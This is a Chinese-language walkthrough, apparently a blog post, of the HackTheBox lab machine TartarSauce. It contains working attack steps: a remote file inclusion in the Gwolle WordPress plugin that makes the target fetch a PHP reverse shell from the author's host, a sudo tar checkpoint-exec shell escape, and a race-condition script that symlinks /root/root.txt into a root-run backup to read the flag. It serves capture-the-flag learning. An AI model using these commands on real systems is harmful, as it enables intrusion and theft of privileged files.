勘探
nmap直接扫
root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:21 EDT
Warning: 10.10.10.88 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.88
Host is up (0.098s latency).
Not shown: 65467 closed ports, 67 filtered ports
PORT STATE SERVICE
80/tcp openhttp
Nmap done: 1 IP address (1 host up) scanned in 26.34 seconds
root@kali:~/hackthebox/tartarsauce-10.10.10.88# nmap -sCV -p 80 10.10.10.88
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 12:25 EDT
Nmap scan report for 10.10.10.88
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
80/tcp openhttpApache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries
| /webservices/tar/tar/source/
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Landing Page
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds
发现是一个完全的web,那么用dirsearch扫
80端口勘探
dirsearch可以发现这个网页中有robots.txt文件
指定了五个目录,不过,那五个都是兔子洞,我在那几个界面浪费了大量的时间。。。
但同时他也暴漏了一个地址/webservice
对这个地址用gobuster中字典爆破发现有/wp目录那是不是代表他有wordpress啊
既然有wp那么我们做进一步的探查
wpscan --url http://tartarsauce.htb/webservices/wp/
wpscan --url http://tartarsauce.htb/webservices/wp/ --enumerate p,t,u
wpscan --url http://tartarsauce.htb/webservices/wp --enumerate p --plugins-detection aggressive
这里作者用欺骗的方式,将wp版本更改成了2的版本,但其实还是1.5,所以wpscan要用aggressive模式
这一点,可以在插件的一个readme中找到
________________________________________________________________________ _____\ \/ /__ \ / ____| \ \/\/ /| |__) | (___ _____ _ _ __ ®\ // / |___/ ___ \ / __|/ _` | '_ \ \/\/| | ____) | (__| (_| | | | |// |_||_____/ ___|__,_|_| |_|WordPress Security Scanner by the WPScan Team Version 2.9.3Sponsored by Sucuri - https://sucuri.net @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________
...
[+] We found 3 plugins:
[+] Name: akismet - v4.0.3
|Last updated: 2018-05-26T17:14:00.000Z
|Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
|Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
[!] The version is out of date, the latest version is 4.0.6
[+] Name: brute-force-login-protection - v1.5.3
|Latest version: 1.5.3 (up to date)
|Last updated: 2017-06-29T10:39:00.000Z
|Location: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/
|Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/brute-force-login-protection/readme.txt
[+] Name: gwolle-gb - v2.3.10
|Last updated: 2018-05-12T10:06:00.000Z
|Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
|Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
[!] The version is out of date, the latest version is 2.5.2
[+] Enumerating installed themes (only ones marked as popular) ...
...
提权至www-date
那么我们发发现有gwolle可以试一试gwolle的跨域文件包含
具体实现步骤是这样的(其实在searchspolit中可以看到漏洞作者写的exp)
1.用python打开一个微服务
python -m SimpleHTTPServer 12345
注意,你命令行打开的位置就是这个服务共享的位置
2.在分享的文件夹中创建一个回连shell脚本命名为wp-load.php,我使用的是/usr/share/webshells/php/php-reverse-shell.php这个msf的脚本,注意修改脚本内的host和port
注意为什么叫这个名字,其实是为了方便
└─# python -m SimpleHTTPServer 12345 1 ⨯
Serving HTTP on 0.0.0.0 port 12345 ...10.10.10.88 - - [28/Dec/2021 19:38:11] "GET /wp-load.php HTTP/1.0" 200 -
10.10.10.88 - - [28/Dec/2021 20:07:40] "GET /b.sh HTTP/1.1" 200 -
连接测试的时候发现这个跨域访问会直接连接这个文件,所以这样不用加文件名
3.打开nc监听
4.用curl访问链接或者直接浏览器访问
curl -s http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.3:12345/
注意,端口改自己脚本中的端口,地址的端口最后必须加/
然后就能连接到了
提权至onuma
一般操作sudo -l发现tar有onuma权限
$ sudo -l
Matching Defaults entries for www-data on TartarSauce:env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User www-data may run the following commands on TartarSauce:(onuma) NOPASSWD: /bin/tar
那么利用漏洞
$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar: Removing leading `/' from member names
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
有关于tar提权的其他方法和原理请参照与我另一篇文章
提权至root
find一下没有什么可以利用的
sudo 刚刚看了没有root权限的进程
用pspy查看一下进程
./pspy32
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855 ██▓███████████▓███ ▓██ ██▓▓██░██▒▒██▒ ▓██░██▒▒████▒▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░▒██▄█▓▒ ▒▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░▒██▒ ░░▒██████▒▒▒██▒ ░░ ░ ██▒▓░▒▓▒░ ░░▒ ▒▓▒ ▒ ░▒▓▒░ ░░██▒▒▒ ░▒ ░ ░ ░▒░ ░░▒ ░ ▓██ ░▒░ ░░ ░░░░░ ▒ ▒ ░░ ░ ░ ░ ░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2021/12/28 04:09:07 CMD: UID=0PID=95 |
2021/12/28 04:09:07 CMD: UID=0PID=936| /usr/lib/policykit-1/polkitd --no-debug2021/12/28 04:09:07 CMD: UID=0PID=919| /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog2021/12/28 04:09:07 CMD: UID=0PID=9|
2021/12/28 04:09:07 CMD: UID=0PID=85 |
2021/12/28 04:09:07 CMD: UID=0PID=83 |
2021/12/28 04:09:07 CMD: UID=0PID=82 |
2021/12/28 04:09:07 CMD: UID=0PID=81 |
2021/12/28 04:09:07 CMD: UID=108PID=805| /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
2021/12/28 04:09:07 CMD: UID=0PID=804| /usr/lib/snapd/snapd
2021/12/28 04:09:07 CMD: UID=0PID=803| /usr/bin/vmtoolsd
2021/12/28 04:09:07 CMD: UID=104PID=801| /usr/sbin/rsyslogd -n
2021/12/28 04:09:07 CMD: UID=0PID=800| /usr/sbin/atd -f
2021/12/28 04:09:07 CMD: UID=0PID=80 |
2021/12/28 04:09:07 CMD: UID=0PID=8|
2021/12/28 04:09:07 CMD: UID=0PID=799| /usr/sbin/cron -f
2021/12/28 04:09:07 CMD: UID=0PID=795| /usr/lib/accountsservice/accounts-daemon
2021/12/28 04:09:07 CMD: UID=0PID=794| /usr/bin/lxcfs /var/lib/lxcfs/
2021/12/28 04:09:07 CMD: UID=0PID=792| /lib/systemd/systemd-logind
2021/12/28 04:09:07 CMD: UID=0PID=79 |
2021/12/28 04:09:07 CMD: UID=0PID=789| /usr/sbin/acpid
2021/12/28 04:09:07 CMD: UID=0PID=78 |
2021/12/28 04:09:07 CMD: UID=0PID=77 |
2021/12/28 04:09:07 CMD: UID=0PID=7|
2021/12/28 04:09:07 CMD: UID=100PID=676| /lib/systemd/systemd-timesyncd
2021/12/28 04:09:07 CMD: UID=1000 PID=6558 | ./pspy32
2021/12/28 04:09:07 CMD: UID=1000 PID=6511 | /bin/bash
2021/12/28 04:09:07 CMD: UID=1000 PID=6510 | tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash2021/12/28 04:09:07 CMD: UID=0PID=6509 | sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash2021/12/28 04:09:07 CMD: UID=0PID=648|
2021/12/28 04:09:07 CMD: UID=33 PID=6383 | /bin/sh -i
2021/12/28 04:09:07 CMD: UID=33 PID=6379 | sh -c uname -a; w; id; /bin/sh -i
2021/12/28 04:09:07 CMD: UID=0PID=6365 |
2021/12/28 04:09:07 CMD: UID=0PID=6252 |
2021/12/28 04:09:07 CMD: UID=0PID=6250 |
2021/12/28 04:09:07 CMD: UID=33 PID=6249 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=0PID=6|
2021/12/28 04:09:07 CMD: UID=0PID=5971 |
2021/12/28 04:09:07 CMD: UID=0PID=432|
2021/12/28 04:09:07 CMD: UID=0PID=426| /lib/systemd/systemd-udevd
2021/12/28 04:09:07 CMD: UID=0PID=425| /sbin/lvmetad -f
2021/12/28 04:09:07 CMD: UID=0PID=406|
2021/12/28 04:09:07 CMD: UID=0PID=405|
2021/12/28 04:09:07 CMD: UID=0PID=404|
2021/12/28 04:09:07 CMD: UID=0PID=401|
2021/12/28 04:09:07 CMD: UID=0PID=400| /lib/systemd/systemd-journald
2021/12/28 04:09:07 CMD: UID=0PID=4|
2021/12/28 04:09:07 CMD: UID=0PID=35 |
2021/12/28 04:09:07 CMD: UID=0PID=348|
2021/12/28 04:09:07 CMD: UID=0PID=347|
2021/12/28 04:09:07 CMD: UID=0PID=34 |
2021/12/28 04:09:07 CMD: UID=0PID=307|
2021/12/28 04:09:07 CMD: UID=0PID=306|
2021/12/28 04:09:07 CMD: UID=0PID=30 |
2021/12/28 04:09:07 CMD: UID=0PID=297|
2021/12/28 04:09:07 CMD: UID=0PID=296|
2021/12/28 04:09:07 CMD: UID=0PID=29 |
2021/12/28 04:09:07 CMD: UID=0PID=28 |
2021/12/28 04:09:07 CMD: UID=0PID=272|
2021/12/28 04:09:07 CMD: UID=0PID=27 |
2021/12/28 04:09:07 CMD: UID=0PID=26 |
2021/12/28 04:09:07 CMD: UID=0PID=25 |
2021/12/28 04:09:07 CMD: UID=0PID=24 |
2021/12/28 04:09:07 CMD: UID=0PID=23 |
2021/12/28 04:09:07 CMD: UID=0PID=22 |
2021/12/28 04:09:07 CMD: UID=0PID=21 |
2021/12/28 04:09:07 CMD: UID=0PID=20 |
2021/12/28 04:09:07 CMD: UID=0PID=2|
2021/12/28 04:09:07 CMD: UID=0PID=199|
2021/12/28 04:09:07 CMD: UID=0PID=197|
2021/12/28 04:09:07 CMD: UID=0PID=194|
2021/12/28 04:09:07 CMD: UID=0PID=19 |
2021/12/28 04:09:07 CMD: UID=0PID=18 |
2021/12/28 04:09:07 CMD: UID=0PID=172|
2021/12/28 04:09:07 CMD: UID=0PID=171|
2021/12/28 04:09:07 CMD: UID=0PID=170|
2021/12/28 04:09:07 CMD: UID=0PID=17 |
2021/12/28 04:09:07 CMD: UID=0PID=16 |
2021/12/28 04:09:07 CMD: UID=0PID=15 |
2021/12/28 04:09:07 CMD: UID=0PID=14 |
2021/12/28 04:09:07 CMD: UID=33 PID=1395 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=0PID=13 |
2021/12/28 04:09:07 CMD: UID=33 PID=1230 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=33 PID=1229 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=33 PID=1228 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=33 PID=1227 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=33 PID=1226 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=0PID=1209 | /usr/sbin/apache2 -k start
2021/12/28 04:09:07 CMD: UID=0PID=12 |
2021/12/28 04:09:07 CMD: UID=0PID=1145 | /sbin/agetty --noclear tty1 linux2021/12/28 04:09:07 CMD: UID=0PID=112|
2021/12/28 04:09:07 CMD: UID=107PID=1116 | /usr/sbin/mysqld
2021/12/28 04:09:07 CMD: UID=0PID=1108 | /sbin/iscsid
2021/12/28 04:09:07 CMD: UID=0PID=1107 | /sbin/iscsid
2021/12/28 04:09:07 CMD: UID=0PID=11 |
2021/12/28 04:09:07 CMD: UID=0PID=10 |
2021/12/28 04:09:07 CMD: UID=0PID=1| /sbin/init
2021/12/28 04:10:04 CMD: UID=0PID=6580 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0PID=6579 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0PID=6578 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0PID=6577 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0PID=6576 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0PID=6575 | cut -d-f1
2021/12/28 04:10:04 CMD: UID=0PID=6574 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6573 |
2021/12/28 04:10:04 CMD: UID=0PID=6572 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6571 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0PID=6570 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0PID=6569 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0PID=6568 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0PID=6567 | /lib/systemd/systemd-udevd
2021/12/28 04:10:04 CMD: UID=0PID=6566 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6583 |
2021/12/28 04:10:04 CMD: UID=0PID=6582 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6581 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6584 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6586 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6596 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6605 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6609 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6611 |
2021/12/28 04:10:04 CMD: UID=0PID=6613 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6615 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6617 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6618 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6620 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6622 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6624 |
2021/12/28 04:10:04 CMD: UID=0PID=6626 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6633 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6634 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6637 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6639 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6643 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6644 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6647 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6649 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=0PID=6650 |
2021/12/28 04:10:04 CMD: UID=0PID=6653 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6655 | /usr/bin/printf -
2021/12/28 04:10:04 CMD: UID=0PID=6662 | /bin/sleep 30
2021/12/28 04:10:04 CMD: UID=0PID=6661 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:04 CMD: UID=1000 PID=6665 | /bin/tar -zcvf /var/tmp/.1beeeb196d0924b2bfdec12dc9ba71e68ba43b8c /var/www/html2021/12/28 04:10:04 CMD: UID=1000 PID=6666 | gzip
2021/12/28 04:10:34 CMD: UID=0PID=6672 | gzip -d
2021/12/28 04:10:34 CMD: UID=0PID=6671 | /bin/tar -zxvf /var/tmp/.1beeeb196d0924b2bfdec12dc9ba71e68ba43b8c -C /var/tmp/check2021/12/28 04:10:35 CMD: UID=0PID=6674 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:35 CMD: UID=0PID=6673 | /bin/bash /usr/sbin/backuperer
2021/12/28 04:10:36 CMD: UID=0PID=6675 | /bin/mv /var/tmp/.1beeeb196d0924b2bfdec12dc9ba71e68ba43b8c /var/backups/onuma-www-dev.bak2021/12/28 04:10:36 CMD: UID=0PID=6676 | /bin/rm -rf /var/tmp/check . ..2021/12/28 04:10:36 CMD: UID=0PID=6677 |
2021/12/28 04:10:36 CMD: UID=0PID=6680 |
文件分析
发现有一个/usr/sbin/backuperer这个很可疑
这是这个文件的原理
cat backuperer
#!/bin/bash
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------
# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check
# formatting
printbdr()
{for n in $(seq 72);do /usr/bin/printf $"-";done
}
bdr=$(printbdr)
# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg
# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check
# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &
# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30
# Test the backup integrity
integrity_chk()
{/usr/bin/diff -r $basedir $check$basedir
}
/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check
if [[ $(integrity_chk) ]]
then# Report errors so the dev can investigate the issue./usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran :$(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsgintegrity_chk >> $errormsgexit 2
else# Clean up and save archive to the bkpdir./bin/mv $tmpfile $bkpdir/onuma-www-dev.bak/bin/rm -rf $check .*exit 0
fi
检查了这个sh脚本后我们研究了它的执行流程
大致就是
1.先创建一个脚本象征,写明了脚本上次运行的时间
2.删除上次的临时文件
3.把网页文件备份成一个压缩包的形式保存至临时文件夹
4.sleep30秒
5.在临时文件夹中创建一个check文件夹
6.把上次压缩的文件提取到check文件夹zhong
7.比较check文件夹中的内容和源文件夹中的内容的区别,如果一样九八零食文件删除掉
8.如果不一样,就将错问信息写入错误日志文件中,并将diff比较的内容,也就是两个比较发生错误的文件写入错误日志中
操作
那么我们的思路就有了,就是在上述脚本完成备份后休息的那三十秒,我们打开备份,修改其中的某个文件为/root/root.txt然后再把这个备份重新压缩好,把原来的备份删掉,之后打开错误报告查看root文件就是了
但是这么多的步骤我们肯定是做不到三十秒内敲完了
就需要写脚本
这里借用0xdf编写的脚本
#!/bin/bash
# work out of shm
cd /dev/shm
# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")
# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; dosleep 10;cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done
# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .
# get filename
fn=$(echo $cur | cut -d'/' -f4)
# extract archive
tar -zxf $fn
# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt
# remove old archive
rm $fn
# create new archive
tar czf $fn var
# put it back, and clean up
mv $fn $cur
rm $fn
rm -rf var
# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt
402
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
